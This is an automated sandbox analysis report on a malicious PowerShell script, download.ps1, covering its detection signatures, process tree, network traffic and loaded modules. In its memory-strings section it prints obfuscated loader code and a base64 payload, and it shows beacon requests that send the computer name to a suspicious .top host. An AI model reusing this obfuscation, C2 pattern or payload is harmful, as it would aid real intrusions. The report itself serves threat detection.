Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
download.ps1

Overview

General Information

Sample name:download.ps1
Analysis ID:1579870
MD5:6dc27c0ae6c260bbed7a9b00e3306263
SHA1:66d59a64b88b605d7fe887b4bcf7c9ea298fbb57
SHA256:fca7d47c39e4e5b1e375ff7497d67cfbd2bb4d2fa937c617f5a6b5c3c71ccb21
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • powershell.exe (PID: 2668 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
No configs have been found
No yara matches
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5020, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 2668, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5020, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 2668, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.19711562814.0000012D47476000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 6?lib.pdbpdblib.pdbR source: powershell.exe, 00000000.00000002.19711562814.0000012D473FF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbQ source: powershell.exe, 00000000.00000002.19714097677.0000012D47632000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.19713429136.0000012D474F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdb% source: powershell.exe, 00000000.00000002.19711562814.0000012D473FF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.19713678701.0000012D475E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19711562814.0000012D4747A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.19714097677.0000012D47627000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 364e35\System.Management.Automation.pdb, source: powershell.exe, 00000000.00000002.19711562814.0000012D473FF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.19713678701.0000012D475E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdb@ source: powershell.exe, 00000000.00000002.19711562814.0000012D473FF000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

Networking

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET /sorry/index?continue=http://www.google.com/&q=EgS_YOPMGLmspbsGIjABsAknkK1fPQw7soCldGAb8V4-f3S2hKBFyuD5NMh92dMWpKKNr9WYzRGbiwpSeC0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=d35BnNjBn9lHyRyhcXI14E66uAwGvq18XUwHjerGxFuNTfLtsWmjtFbfRwypj2bSbZ9RlpMTupjEwY5UwFGMceytw9HGj6d2WYCAPsog_yQagaD2LroYRzyJYubdZH1CPtVLRAZ7gcTyIqllglQdRtJTHBox9xMpU5ylIFEutZV7Kgj9Ek5kGQiq22D2eMqdPddc2w
Source: Joe Sandbox ViewIP Address: 45.61.136.138 45.61.136.138
Source: global trafficHTTP traffic detected: GET /hxe035pvfthtr.php?id=computer&key=72113948934&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: gajaechkfhfghal.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgS_YOPMGLmspbsGIjABsAknkK1fPQw7soCldGAb8V4-f3S2hKBFyuD5NMh92dMWpKKNr9WYzRGbiwpSeC0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=d35BnNjBn9lHyRyhcXI14E66uAwGvq18XUwHjerGxFuNTfLtsWmjtFbfRwypj2bSbZ9RlpMTupjEwY5UwFGMceytw9HGj6d2WYCAPsog_yQagaD2LroYRzyJYubdZH1CPtVLRAZ7gcTyIqllglQdRtJTHBox9xMpU5ylIFEutZV7Kgj9Ek5kGQiq22D2eMqdPddc2w
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /hxe035pvfthtr.php?id=computer&key=72113948934&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: gajaechkfhfghal.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgS_YOPMGLmspbsGIjABsAknkK1fPQw7soCldGAb8V4-f3S2hKBFyuD5NMh92dMWpKKNr9WYzRGbiwpSeC0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=d35BnNjBn9lHyRyhcXI14E66uAwGvq18XUwHjerGxFuNTfLtsWmjtFbfRwypj2bSbZ9RlpMTupjEwY5UwFGMceytw9HGj6d2WYCAPsog_yQagaD2LroYRzyJYubdZH1CPtVLRAZ7gcTyIqllglQdRtJTHBox9xMpU5ylIFEutZV7Kgj9Ek5kGQiq22D2eMqdPddc2w
Source: global trafficDNS traffic detected: DNS query: gajaechkfhfghal.top
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2FF8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$ckda40xjnqlemz6/$jqly5pcaxf6vo3g.php?
Source: powershell.exe, 00000000.00000002.19683260823.0000012D305E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D303D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$ckda40xjnqlemz6/$jqly5pcaxf6vo3g.php?id=$env:computername&key=$dhvyekza&s=527
Source: powershell.exe, 00000000.00000002.19710229213.0000012D47075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000000.00000002.19710229213.0000012D47075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000000.00000002.19711229210.0000012D471D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micr
Source: powershell.exe, 00000000.00000002.19683260823.0000012D303D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D2F96C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D30450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gajaechkfhfghal.top
Source: powershell.exe, 00000000.00000002.19683260823.0000012D303D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D2F96C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gajaechkfhfghal.top/hxe035pvfthtr.php?id=computer&key=72113948934&s=527
Source: powershell.exe, 00000000.00000002.19683260823.0000012D303D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gajaechkfhfghal.top/hxe035pvfthtr.php?id=computer&key=72113948934&s=527p
Source: powershell.exe, 00000000.00000002.19705043649.0000012D3F0B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2F041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
Source: powershell.exe, 00000000.00000002.19683260823.0000012D3045C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D2FF7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D3046F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D30450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.19683260823.0000012D30450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/
Source: powershell.exe, 00000000.00000002.19683260823.0000012D3046F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/&q=EgS_YOPMGLmspbsGIjABsAknkK1fPQw7soCldGAb8V4-f3S2hKBFyuD5NMh92dMWpKKNr9WYzRG
Source: powershell.exe, 00000000.00000002.19683260823.0000012D3045C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D2FF7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS_YOPMGLmspbsGIjABsAknkK1fPQw7
Source: powershell.exe, 00000000.00000002.19710229213.0000012D47075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2F041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.19705043649.0000012D3F0B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.19705043649.0000012D3F0B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.19705043649.0000012D3F0B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.19683260823.0000012D3045C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXz
Source: powershell.exe, 00000000.00000002.19683260823.0000012D308E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.19705043649.0000012D3F0B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.19710229213.0000012D47075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: powershell.exe, 00000000.00000002.19683260823.0000012D3047C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D30482000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D2FF8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D30450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/api.js
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD086C7A760_2_00007FFD086C7A76
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD086C88220_2_00007FFD086C8822
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD089332860_2_00007FFD08933286
Source: classification engineClassification label: mal56.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7548:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7548:304:WilStaging_02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a5sap3pl.vk3.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $pxso79gauievdqb.(([system.String]::new(@((166361/2483),(384171/(1130+2331)),(-5258+5370),(-7731+(10041-2189)),(7604-(19597120/2606)),(8753-8642)))))( $c3f8zdw7rg5ahto ) $pxso79gauievdqb.(([system.String]::new(@((9352-(37177140/4004)),(456192/4224),(-6769+(80+6800)),(-208+(-6187+(597+(14068-8155)))),(-6569+6670)))))()$nhvut5xwzaj3rgy.(([system.String]::new(@((237917/3551),(1085616/10052),(4015-(5446-(9650-8108))),(-8412+8527),(617918/(3034528/496))))))()[byte[]] $tos490z6qg18jkv = $c3f8zdw7rg5ahto.((-join (@((491400/(15110-(25233500/2725))),(996558/8978),(15925/(9664-(19354-9935))),(311448/(11471-(11931-3192))),(6658-6544),(49761/513),(-3536+(21905430/5990)))| ForEach-Object { [char]$_ })))() $q9lpzry8nioak2v=$tos490z6qg18jkv return $q9lpzry8nioak2v}[System.Text.Encoding]::ascii.((-join (@((2523-2452),(-4317+(-1948+(-780+7146))),(-7269+(14457-(12786-(44946324/7866)))),(989-(-3172+4078)),(-7895+(10112-(7645-5544))),(9469-(95570680/(52602184/(17939116/(17200508/(9048-4111)))))),(-2810+2915),(-3634+(24452064/(1012+(5828064/(2011-(10680-9725)))))),(462882/(14147-(19277-9624))))| ForEach-Object { [char]$_ })))((o1kytfw9q8rhup2gsci3j65vdmx "ePppNXh3aTRmbsmsPB58Ygry9hcikY33BxevfDfcnskAL6Q39D3/B3sTd8YCZm0aejr1HSrVwZ+PkfJYsp8ipMKv23NUSjJ5EJ48jhKiM2G32QPq0Y7vK+XpFkselIHAWM1f7EcJE02NBpNBmJG00LGOsLeR3afKvLracreoNahdEhvNi6+Xio7gmktdkafO1JbOG49gloxe0BDCFQYGzok6h1iFSYsQAOqMqs+sN35oALWRNy3vi1Te7Yq5kwXsPD2SA4CbE14PZ60wmkkEYrO1pk+rMvpUlc+HUCM05ufUm6BapcMMkMAOgo2qofksi7f+ChWQf3b7NOBiqJE4RrdWgSNflljCj0K+0ezEd2r4GVBLXAp2xrxIV8HL6nTxqlMK3EQaJ/G1x6oBMb9ufiUtRqWNEpp2+Hj8mJJ8dq6JX7kSkGmmr/L8Bx5cBiFErc8sbdmGJESYrVkKAwzchZq1XAsPkBZJlu6mOma4Fsucp5L2gpem+A94dys9slPN2LyuDjQZtkkVkVIhadCY6c3wOz8ZZrJ6vFuixQ1/BR/UPD++AthIo1M0/KSJqrkJsmmd9/KUkU3OH0aerj9cY3Rv8zh6E8Oi0veLrpvv/yrRvXkCwLezwPfZxgHmx1oMZ2zXA1Q0pOyrHeivFt9Q77uvHambP2RES7CPo+sEGjq/nxkeOdZ9Zq8RS1NXF4uN+r8HzaBoloy5EJvFurqqyMtMlozeVlVME466WreBBsTfo1rQrcwzKjM+M34u1AP9yhmkazf+xP5xTddfEpCV+HRbtHm6SrUGHk4aqTdRoBmtU3nassoxNnO7WMZ+8d9aR/ZZWit9F95f93eCN8sv7B2rR0dhXXd5pq8890mUi0mTGFksKxyAU7mZfMXE69NaxkgZqHhZ/ha0Ntzbnbl57d+OUE8p8g25Eb/WWsULGkabjp3Bj4OD4AaAitk5kZ7UMjEO04X8pOVtqcsYkE4OS0QNkcyX1ZHkkLayiLVh5kDLCJCxZJWp1xapi673/R0zvKyswm+MipMVWVNIgfcb51+A+q+buC776tnqt/wh0rGcWBv54dFC/0mS3Rm/wvZrNAHWBSQBsP6n1T+vYf5G+NTaJ40XK1Op60RZgX0wZF2UU3Yfm6MrjBl54BSS+9Qwx5W9qPh2KsaudLFZu6j08eIvABPQnyhykaVZToWJuplwqtnTJ01xrxVdhVVFamj8bXmpg7u67MWdv7/AqC6M6kQJkdqnp6nu2twA2IdJUm2BEZ8eoS/itZpNF+FPCAqLpDzfrb93UElUuY4gZub4NwZe5noaJmxCDMD5MFBHKp1coFFBUHG7YuV1R/RdcDxXAL+EL3WT0UqE0vAQ82YO1Un37JTqfyzCgf8dl5i28VdO4H/RJu09XV1aqXDTBr/l9SL9xxEHDB28bsSS5ZIUqu0zE5yMKIjoV7N9b+KV6Rkg7scVN7fARLzOPjMmhCiDcK0HruS1fYSUVmeXtd4zfXdKpOl5ho0jQns9JslAPEccjy2fH+nONj9qzyWO3104cfbdVbF2241HWYmp0lsdojUTKqXbWlCOdZp3i0QHMp9wTDU4/3tEuHyzm1KwfqWFQs5h9QYX3dsvcOOSFrzkau7s+Uz37lsvPEGkp5SXDnrVDQao4ezl6aNtUquDxdo1bdctBsZUtbp/8uaaflFyuAHeuILyX2v2LX+31AAgtI7UrLYVyXSrU+hbsBlpdxAZLY+7hVOX/P9BQ7gDngARRrV52rRZ+KZkCgP3LbRmmAUjP7K6UzB7JE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
